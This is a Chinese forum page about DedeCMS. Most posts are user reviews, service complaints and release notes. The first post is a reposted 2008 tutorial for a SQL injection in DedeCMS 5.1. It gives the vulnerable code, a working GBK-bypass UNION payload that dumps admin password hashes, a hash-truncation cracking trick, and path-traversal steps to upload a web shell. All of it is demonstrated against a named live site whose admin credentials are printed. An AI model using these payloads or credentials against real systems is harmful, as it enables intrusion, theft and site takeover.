如果你已经有账户,那么请 登入 或者现在就 注册一个新账户
Free DNS and IP tools ... 飞腿社区支持的UBB代码
...   你设置了自己的所在地么? ...   中国各省的域名后缀 ...   自己和自己玩
V2EX / 装备 / Dedecms   

  dedecms搜索型注入0day (2008.11.09)

dedecms GBK 5.1 搜索型注射0day

以下内容转载:

大家好,期待已久。今天给大家带来新的0day了
这个oday是有我老师CHAR发现的,因为工作关系不方便做动画,今天由我来给大家演示

漏洞成因:
$q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";
获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交.


废话不多说大家看操作

其他的自己下去研究楼

利用地址:
plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,注意:
我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了.
24-8=16

详细了解可到我们学校的网站:
http://www.yhsafe.com
http://www.yhsafe.com/announce/2008/1108/article_46.html
演示网站:http://www.oiole.com/


dede/file_manage_main.php?activepath=/../


直接在网站地址后面加上利用地址就OK
http://www.oiole.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

忽忽,很激动吧,别急
账号:admin密码:f6e75e3832e763b6
密码是24位哦
呵呵24-8=16
常识
猜出来了密码是:sina.com
默认的dedecms后台都是dede目录下的,我们来看看
后台地址:http://www.oiole.com/dede/login.php?gotopage=%2Fdede%2Findex.php
成功登录,正在转向管理管理主页!
进入后台怎么拿SHELL那?
?????
貌似fckeditor编辑器哦
废话少说
看这里了dede/file_manage_main.php?activepath=/../
直接加到网站后面
http://www.oiole.com/dede/file_manage_main.php?activepath=/../
最下面新建文件
压得操作块了
(空白表示根目录 ,不允许用 “..” 形式的路径)
表示,我们加的文件在根目录下的
test.asp我们打开看看
哦yes上去了
动画就到这里吧

http://www.yhsafe.com/demo/2008/1109/down_609.html ... 0 篇回复 | 参与讨论 | tnrain | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank

  DEDECMS v5.01使用手记

DEDE终于发布 5.01稳定版,一个字:强! DEDE的强悍体现在方方面面,用现在流行的口号来讲,是“很好,很强大!”

6 万多数据全新生成大概仅仅需要半小时,和以前使用的FOOSUN是没有办法相比的。以前使用的FOOSUN从3.1到最终版本(ASP,ACCESS)版本,1万条数据都要等一晚上。hoho,这意味着,利用火车头的入库工具+DEDE,一个10万条的数据可以在一天内生成,我狂晕。

还有一点,DEDE程序的易用性非常好。菜鸟几乎在一天内可以上手,程序不需要复杂的页面设置,而FOOSUN在处理分列的时候非常麻烦(这点恐怕用过 FOOSUN的人深有体会)。另外,DEDE的自由列表也非常有创意,利用自有列表,几乎任何TAGS可以自由的分类,这实现了我以前提到的“自由分类” 设想,用户贡献的tags决定了该分类是否存在。柏拉图真天才也。

新版的5.01还考虑了各种需求,将各种功能以模块化的方式进行安装,用户可根据需要自由选择安装或者卸载,像我这样只是需要普通文章系统的就禁用了几乎所有channel和模块,只剩下最核心的文章部分。

但我仅仅是个菜鸟,PHP可以说是个白痴,这样都让我建起一个站点,可以偷笑了。

http://www.networkland.com.cn/post/5.html... 0 篇回复 | 参与讨论 | 蓝色梦幻 | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank

  DeDeCms V5 正式版发布

DedeCms2007介绍

DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出,Dedecms 2007具有如下特性:

一、核心模板采用XML名字空间风格,模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持;

二、标签缓存机制,Dedecms 2007允许对类同的标签进行缓存,在生成HTML的时候,有利于提高系统反应速度,降低系统消耗的资源;

三、模型与模块的概念并存,在模型不能满足用户所有需求的情况下,DedeCms推出一些互动的模块对系统进行补充,尽量满足用户的需求;

四、众多的应用支持,为用户提供了各类网站建设的一体化解决方案,在本版本中,增加了分类、书库、黄页、圈子、问答等模块,补充一些用户的特殊要求;

五、面向未来的过渡,DedeCms 2007是织梦组建团队以后发布的第一个版本,在织梦团队未来的构想中,它以后将会具有更大的灵活性和稳定的性能。
http://www.dedecms.com/html/chanpinxiazai/20080121/39437.html... 0 篇回复 | 参与讨论 | 蓝色梦幻 | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank

  我为什么想买dedecms的服务

虽然说是我也搞程序的,但是我买服务就是想节省我的时间,让他们专业的团队给我提供服务,我省的时间可以搞其他的,如果他们的服务不好或不到位,那还不如不买。... 0 篇回复 | 参与讨论 | 蓝色梦幻 | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank

  转贴一篇使用dedecms的感受

  1、负载能力

  从3.01、4.0,到现在的2007,除去自己修改为文本存储,继续用系统自带MYSQL系统存储20W数据的用户有多少?

  2、HTML生成速度

  同比帝国,10000数据,速度与效率要低50%以上,当然,我是用WIN2003+IIS+PHP+MYSQL来测试的,LINUX系统未测试。本测试时间见图片

  3、系统可扩展性

  最近两天,实在无法忍受DEDE的效率,开始研究其他CMS,在测试帝国系统10000文章,几分钟可以刷新完毕后,开始仔细分析其系统的实用性。帝国扩展性强,可操作性差,一般如我小菜鸟,无法熟练应用。比较复杂。也可能是用DEDE比较直观的操作界面习惯有关系。DEDE界面再简单,无法满足站长发展的需要,一样会被淘汰。

  4、服务

  我购买了DEDE的商业用户服务,可现在的确无法享受到任何服务。有一次对DEDE系统有所疑问,研究了一天也没搞懂,只想问一下BLT能否实现,就在QQ冒昧的问了一下他,他回答:我没有义务回答这样的问题。。。。

  我实在无言,同比帝国,我在程序发布区问的相关疑问,WC都能保证回复,并且在一个帖子回复两次以上。

  可能BLT业务比较繁忙,但没有顾及当初购买商业服务用户的感受,也并未为商业服务用户的服务做出具体安排。BLT新的商业用户服务授权,价格与提供的服务,我暂时不能接受,假如,在以前我所花费的RMB面前,还未享受到任何服务的前提下,是不会再去购买其商业服务的。很多现在的商业用户都在商业用户论坛服务区感叹,我们究竟购买了什么服务?是进入这个版面的特权?还是无须回复就可以看到隐藏的帖子?

  现在正在研究帝国中,应用熟练后,可能考虑购买帝国的服务。

  5、统筹计划

  要真实的看到自己系统,并熟悉自己的系统。

  可以肯定并知道未来系统的发展道路,给用户一个清晰的路线图,或者时间表,让用户知道结果和目标。

  小结:DEDE在站长中拥有很大的用户群,其后台的简单、直观的可操作性,让很多菜鸟就可以简单做站,但菜鸟也是在进步的,网站也是在发展的,谁的网站也不会停止在10000数据量而不再前进。我想,DEDE如果能解决以上问题,商业化运行也不是不会成功。

  2008年开始,祝福所有落伍者、DEDE、帝国以及所有在互联网打拼的兄弟,财源广进,万事如意。

  本文同发个人博客:http://www.liyugang.cn... 2 篇回复 | 参与讨论 | 蓝色梦幻 | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank

  DedeCMS的服务谁买了?

不知道他们提供的服务质量如何,好的话也支持一下。... 1 篇回复 | 参与讨论 | 蓝色梦幻 | Add to del.icio.us | Add to reddit | Search in Technorati | Add to Ma.gonolia | Add to BlogMarks | Add to LookSmart FURL | Add to Spurl | Add to simpy | Add to Tailrank
创建新主题 | RSS |  NORMAL Mode
© 2007    -   About
a site powered by Project Babel